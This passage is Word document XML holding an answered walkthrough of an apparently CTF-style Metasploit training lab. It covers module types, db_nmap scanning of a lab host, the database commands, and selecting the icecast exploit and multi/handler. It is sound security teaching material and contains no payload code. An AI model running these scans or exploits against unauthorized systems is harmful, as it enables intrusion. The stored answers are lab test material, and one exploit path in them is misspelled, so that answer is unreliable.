    <w:p w14:paraId="3867C04A" w14:textId="2F36EA9E" w:rsidR="005D4CAE" w:rsidRPr="006F1554" w:rsidRDefault="00443421"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One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FCD629" w14:textId="51958C49" w:rsidR="00443421" w:rsidRPr="006F1554" w:rsidRDefault="00443421"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Commonly utilized in payload obfuscation, which module allows us to modify the 'appearance' of our exploit such that we may avoid signature detection?</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552CB32F" w14:textId="58857E18" w:rsidR="00443421" w:rsidRPr="006F1554" w:rsidRDefault="00443421"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Last but not least, which module is used with buffer overflow and ROP attacks?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2306CB2F" w14:textId="1CDDE2E7" w:rsidR="00443421" w:rsidRPr="006F1554" w:rsidRDefault="00443421" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Not every module is loaded in by default, what command can we use to load different modules?</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E12241" w14:textId="349D000B" w:rsidR="00443421" w:rsidRPr="00E16139" w:rsidRDefault="00443421" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E16139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0617884E" w14:textId="323B8A0E" w:rsidR="00443421" w:rsidRPr="00995BD0" w:rsidRDefault="00443421" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasploit comes with a built-in way to run nmap and feed it's results directly into our database. Let's run that now by using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap -sV </w:t>
      </w:r>
      <w:r w:rsidR="00995BD0">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>10.10.28.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF1B71" w14:textId="5C4DAC89" w:rsidR="00995BD0" w:rsidRPr="006F1554" w:rsidRDefault="00995BD0" w:rsidP="00995BD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B59AAB9" wp14:editId="71E546BA">
            <wp:extent cx="4797293" cy="2697452"/>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3708" cy="2701059"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC0243D" w14:textId="2AF5683D" w:rsidR="00443421" w:rsidRPr="00860A13" w:rsidRDefault="00443421" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>What service does nmap identify running on </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>port 135?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00995BD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ACABBD" w14:textId="3C495576" w:rsidR="00860A13" w:rsidRPr="00995BD0" w:rsidRDefault="004070D4" w:rsidP="00860A13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2541EEC2" wp14:editId="3BEE0698">
            <wp:extent cx="3468331" cy="1950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3227" cy="1958571"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EBD066" w14:textId="357FD474" w:rsidR="00443421" w:rsidRPr="004070D4" w:rsidRDefault="00443421"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Let's go ahead and see what information we have collected in the database. Try typing the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> into the msfconsole now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04063AD0" w14:textId="4B1FCC5D" w:rsidR="004070D4" w:rsidRPr="006F1554" w:rsidRDefault="004070D4" w:rsidP="004070D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B27B28" wp14:editId="4B3521D9">
            <wp:extent cx="4185742" cy="2353586"/>
            <wp:effectExtent l="0" t="0" r="571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1740" cy="2356958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D9CB94" w14:textId="50604C89" w:rsidR="00443421" w:rsidRPr="004070D4" w:rsidRDefault="00443421"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How about something else from the database, try the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19650148" w14:textId="3D3E6D1F" w:rsidR="004070D4" w:rsidRPr="006F1554" w:rsidRDefault="004070D4" w:rsidP="004070D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="641A5823" wp14:editId="763A0758">
            <wp:extent cx="4246087" cy="23875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60627" cy="2395693"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE93D1" w14:textId="77777777" w:rsidR="004070D4" w:rsidRPr="004070D4" w:rsidRDefault="00443421"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One last thing, try the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>vulns</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> now. This won't show much at the current moment, however, it's worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15082D45" w14:textId="058E4FC7" w:rsidR="00443421" w:rsidRPr="006F1554" w:rsidRDefault="00443421" w:rsidP="004070D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="004070D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="340C528E" wp14:editId="4D3C7788">
            <wp:extent cx="3935575" cy="221292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41604" cy="2216310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739873F" w14:textId="23C2829C" w:rsidR="00443421" w:rsidRPr="004070D4" w:rsidRDefault="00443421"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Now that we've scanned our victim system, let's try connecting to it with a Metasploit payload. First, we'll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> followed by a unique string found within only the target exploit. For example, try this out now with the following command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>use icecast</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F01BCF" w:rsidRPr="004070D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="004070D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>xploit/windows/http/iccast_heade</w:t>
      </w:r>
      <w:r w:rsidR="00F01BCF" w:rsidRPr="004070D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78196B37" w14:textId="64492BEB" w:rsidR="004070D4" w:rsidRPr="006F1554" w:rsidRDefault="004070D4" w:rsidP="004070D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B81BBC1" wp14:editId="005E7CB2">
            <wp:extent cx="4543639" cy="25548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470" cy="2559791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F54E18" w14:textId="5A6F609A" w:rsidR="00F01BCF" w:rsidRDefault="00F01BCF" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>While that use command with the unique string can be incredibly useful that's not quite the exploit we want here. Let's now run the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>search multi/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD9CB75" w14:textId="7417EC16" w:rsidR="007918CB" w:rsidRPr="006F1554" w:rsidRDefault="007918CB" w:rsidP="007918CB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175D8440" wp14:editId="5BA734CF">
            <wp:extent cx="4600203" cy="2586631"/>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5708" cy="2595349"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F737F0" w14:textId="3343758D" w:rsidR="007918CB" w:rsidRDefault="00F01BCF" w:rsidP="007918CB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Go ahead and run the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>use NUMBER_NEXT_TO  exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBAEAC6" w14:textId="32670E33" w:rsidR="004070D4" w:rsidRPr="007918CB" w:rsidRDefault="004070D4" w:rsidP="004070D4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidR="00F01BCF" w:rsidRPr="004070D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>What is the name of the column on the far left side of the console that shows up next to 'Name'?</w:t>
      </w:r>
      <w:r w:rsidR="00F01BCF" w:rsidRPr="004070D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E188BFE" w14:textId="6D7EF3AC" w:rsidR="00F01BCF" w:rsidRPr="007918CB" w:rsidRDefault="00F01BCF"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Now type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>use NUMBER_FROM_PREVIOUS_QUESTION</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
